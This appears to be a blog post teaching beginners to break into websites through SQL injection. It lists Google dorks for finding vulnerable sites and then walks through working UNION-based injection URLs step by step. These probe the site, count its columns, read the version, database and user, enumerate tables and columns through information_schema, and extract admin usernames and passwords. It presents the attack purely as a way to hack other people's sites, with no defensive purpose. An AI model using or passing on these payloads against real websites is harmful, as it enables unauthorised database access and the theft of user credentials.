What is SQL Injection?
SQL Injection is the most famous hacking method and it is very easy to use.Even a beginner who is new to hacking can also hack website using this method.By using this method you can access the database (database is a collection of data,it is used to store user ids,passwords,page details,login informations,etc).We can get all details of a website using database.
Follow Steps Given Below To Hack Website:
First of all you have to Find a Vulnerable Website.We can find vulnerable websites from google using google dorks (google dork is a search string that helps you to find information that is not readily available on a website).
Some google dorks:
inurl:index.php?id=
inurl:order.php?id=
inurl:article.php?id=
inurl:login.php?id=
inurl:gallery.php?id=
You just have to copy and paste these dorks to google and you will get list of websites that we need to do our next steps.
Step 1: Checking the Vulnerability of a Website.For this, you have to add single quotes (') at the end of the website and hit enter after putting this.
For Example: http://www.qwertyuiop.com/index.php?id=6'
After hitting enter,if the page remains same then you have to try it on another website but if a website shows error about sql query then it is vulnerable and you can use this website.
Step 2: Find Number of Columns. To find number of columns, we have to replace single quotes (') with order by n ( n is integer like 1,2,3,4,5,6 and so on).
For Example: http://www.qwertyuiop.com/index.php?id=6 order by 1
http://www.qwertyuiop.com/index.php?id=6 order by 2
http://www.qwertyuiop.com/index.php?id=6 order by 3
Change the number until you get an error . If you got error on number 6 then number of column is 5.
Step 3: Displaying the vulnerable columns: To display the vulnerable column you have to add "union select_column sequence".You have to replace "order by n" with union select and also change the id value to negative ( id=2 to id=-2).
For Example: http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,4,5--
Now you will see some numbers on the page and they may be less than or equal to number of columns.Select any one number and i recommend you to choose small number.
For Example: I took number 4.
Step 4: Finding Version,Database,User: Replace 4 with "version()".
For Example: http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,version(),5--
It will show version like 5.0.1 or 4.3. something like this.
Now replace the version() with database() and user() for finding the database and user. Do same as above step.
For Example: http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,database(),4,5--
http://www.qwertyuiop.com/index.php?id=-6 union select 1,2,3,user(),4,5--
Step 5: Finding the Table Name: If the version is 5 or above then we have to find the table name of the database.Replace 4 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
Now it will show you the list of table names.Now look for table name related to admin or user.
Select "admin" table.
Step 6: Finding the Column Name: In this you have to replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()-" with "from information_schema.columns where table_name=mysqlchar-
Now you have to find and convert table name to MysqlChar() string and replace mysqlchar with that.
Find mysqlchar() for table name:
First of all install hackbar addon in mozilla firefox then select sql->mysql->mysqlchar() and this will open a small window .Now enter the table name you found.I am using admin table name and click ok.
Now you can see char(numbers seperated with commas)in the hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar".
Now it will show the list of columns like admin,password,admin_id,admin_name,etc.
Now replace the group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
Columnname should be replaced from the listed column name.
anothercolumnname should be replaced from the listed column name.
Now replace the "from information_schema.columns where table_name=CHAR(97,101,105,120)" with the from table_name"
Sometime it will show the column name is not found then try different column names.
After a lot of hard work you will get username and passwords.
No comments:
Post a Comment